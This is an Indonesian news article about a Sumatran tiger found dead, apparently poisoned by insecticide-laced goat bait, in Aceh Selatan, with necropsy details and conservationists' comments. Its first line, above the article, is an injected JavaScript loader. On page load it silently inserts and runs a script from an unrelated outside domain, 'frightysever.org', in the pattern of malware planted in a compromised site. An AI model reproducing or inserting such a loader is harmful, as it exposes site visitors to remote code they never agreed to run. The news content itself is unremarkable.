(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: NASIONAL

Seekor Harimau Sumatra di Aceh Mati Diracun


KANALKALIMANTAN.COM, ACEH SELATANKepala BKSDA Aceh, Agus Arianto mengatakan seekor harimau Sumatra (Panthera tigris sumatrae) ditemukan mati di perkebunan masyarakat Desa Kapa Seusak, Kecamatan Trumon Timur, Kabupaten Aceh Selatan, Senin (29/6). Kemudian keesokan harinya, tim dokter hewan dari BKSDA Aceh melakukan nekropsi guna mengetahui penyebab kematian harimau betina itu.

“Tim medis kami dan dari beberapa mitra sudah melakukan nekropsi (bedah bangkai). Dari hasil nekropsi disimpulkan bahwa diduga kematian harimau tersebut karena toksik atau keracunan,” kata Agus kepada VOA, Selasa (30/6).

Berdasarkan hasil nekropsi terhadap bangkai harimau berusia dua atau tiga tahun tersebut, kata Agus, kondisi bangkai satwa dilindungi itu sudah mulai mengalami autolisis (perombakan tubuh organisme yang mati oleh enzim tanpa bantuan bakteri).

Lalu, tim medis juga menemukan adanya pendarahan dari lobang nasal, jaringan di bawah kulit sebagian mengalami memar, dan luka diduga akubat kawat duri pada bagian perut. Kemudian, ditemukan zat yang diduga racun insektisida pada kulit mangsa (kambing) yang dimakan harimau. Namun tak ada bagian tubuh harimau tersebut yang hilang.

Tim dokter hewan BKSDA Aceh melakukan nekropsi terhadap harimau Sumatra yang ditemukan mati di Aceh Selatan, Senin 29 Juni 2020 (Courtesy: BKSDA Aceh).

“Adanya potongan kulit hewan ternak yang dimakan harimau. Di situ diduga juga ada zat racun yang terkandung dalam potongan hewan ternak tersebut,” ujarnya.

Agus belum bisa memastikan apakah harimau Sumatra itu mati karena sengaja dibunuh dengan cara diracun. Saat ini BKSDA Aceh telah berkoordinasi dengan Polres Aceh Selatan untuk menyelidiki kematian harimau tersebut.

“Adanya atau tidaknya unsur-unsur tindak pidana dalam kematian harimau itu nanti akan diproses Polres Aceh Selatan,” ungkapnya.

Sebelumnya, kematian harimau Sumatra karena diracun juga terjadi di Sumatra Utara (Sumut) tepatnya di Desa Ranto Panjang, Kecamatan Muara Batang Gadis, Mandailing Natal, Rabu (24/6). Harimau malang tersebut mati usai memakan kambing yang sengaja diumpankan warga. Kambing itu sebelumnya diketahui telah diracun terlebih dahulu oleh masyarakat. Mirisnya, kulit pada bagian dahi harimau Sumatra tersebut hilang.

Sementara itu, Ketua Protection of Forest and Fauna (ProFauna) Indonesia, Rosek Nursahid mengatakan kasus harimau dan satwa langka lainnya yang mati akibat diracun sudah berulang kali terjadi di Pulau Sumatra. Menurutnya, hal itu tidak terlepas dari konflik yang terjadi akibat alih fungsi hutan.

Seekor harimau Sumatra yang ditemukan mati karena terjerat. Hewan yang dilindungi ini sering dianggap hama oleh warga sekitar. (Foto: BBKSDA Riau)

“Satwa-satwa itu kadang dianggap hama dan membahayakan penduduk atau pekerja kebun sehingga diracun,” kata Rosek saat dihubungi VOA.

Lanjutnya, kematian harimau dan satwa dilindungi lainnya yang berulang kali terjadi karena minimnya tindakan preventif.

“Kalau kita hanya (berpatokan) proses hukum berjalan ketika satwa itu mati terbukti setiap tahun ada. Artinya tidak ada efek jera,” pungkas Rosek.

Harimau Sumatra merupakan salah satu jenis satwa yang dilindungi di Indonesia. Berdasarkan The IUCN Red List of Threatened Species, satwa yang hanya ditemukan di Pulau Sumatra ini masuk dalam spesies yang terancam kritis dan beresiko tinggi untuk punah di alam liar. (aa/em)

Reporter : Anugrah
Editor : VOA


Desy Arfianty

Recent Posts

Kicau Mania Ramaikan Kapolresta Banjarmasin Cup 2024

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian Resor (Polres) Kota Banjarmasin menggelar lomba Burung Berkicau, Minggu (19/5/2024) siang,… Read More

4 jam ago

Pastikan Listrik Tanpa Kedip KTT WWF 2024 Bali

KANALKALIMANTAN.COM, DENPASAR - PT PLN (Persero) siap menghadirkan listrik yang andal untuk mendukung penyelenggaraan Konferensi… Read More

5 jam ago

Santri TK Al Quran di Kabupaten Banjar Ikuti Munaqasah

KANALKALIMANTAN.COM, MARTAPURA -  Santri TK Al Quran se-Kabupaten Banjar mengikuti Munaqasah yang digelar Badan Komunikasi… Read More

5 jam ago

Jelang Pilwali Banjarbaru, Nurkhalis: Masih Lihat Peta Peluang Koalisi

KANALKALIMANTAN.COM, BANJARBARU - Peta koalisi partai politik jelang Pilkada 2024 di Kota Banjarbaru Kalimantan Selatan… Read More

7 jam ago

Daftar Bareng Aditya-Yuti, Koalisi “AYUHA” PPP-Gerindra di Pilwali Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Teka-teki maju atau tidaknya Aditya Mufti Ariffin mulai terjawab, bahkan siapa calon… Read More

8 jam ago

Manis Cuan Pokmas Madu Kelulut Berkat Bersatu dari Program RT Mandiri

KANALKALIMANTAN.COM, BANJARBARU – Berawal dari temuan sarang kelulut di dalam pondasi rumah tinggal warga, muncul… Read More

10 jam ago

This website uses cookies.